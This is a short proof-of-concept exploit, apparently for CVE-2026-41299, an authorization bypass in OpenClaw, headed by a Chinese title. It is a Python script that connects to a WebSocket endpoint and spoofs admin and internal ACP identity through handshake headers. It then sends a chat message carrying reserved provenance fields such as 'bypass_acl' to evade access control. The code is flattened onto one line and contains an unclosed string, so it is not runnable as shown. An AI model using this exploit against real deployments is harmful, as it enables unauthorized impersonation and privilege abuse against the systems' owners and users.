CVE-2026-41299 OpenClaw授权绕过漏洞

import asyncio import websockets import json async def spoof_acp_identity(): # Target WebSocket endpoint uri = "ws://target-openclaw-instance:8080/ws" # Malicious metadata to spoof ACP identity during handshake # This exploits the lack of server-side verification spoofed_metadata = { "role": "admin", "origin": "acp_bridge", "is_internal": True } # Custom headers representing the self-declared metadata extra_headers = { "X-Client-Metadata": json.dumps(spoofed_metadata) } try: async with websockets.connect(uri, extra_headers=extra_headers) as websocket: print("[+] Connected to WebSocket with spoofed ACP metadata.") # Construct payload injecting reserved provenance fields payload = { "action": "chat.send", "channel": "general", "content": "This message has spoofed provenance", "provenance": { "acp_source": "admin_console", # Reserved field "bypass_acl": True # Reserved field } } await websocket.send(json.dumps(payload)) print("[+] Payload sent. Check if the server accepts the reserved provenance fields.") response = await websocket.recv() print(f"[+] Server response: {response}") except Exception as e: print(f"[-] Exploit failed: {e} if __name__ == "__main__": asyncio.get_event_loop().run_until_complete(spoof_acp_identity())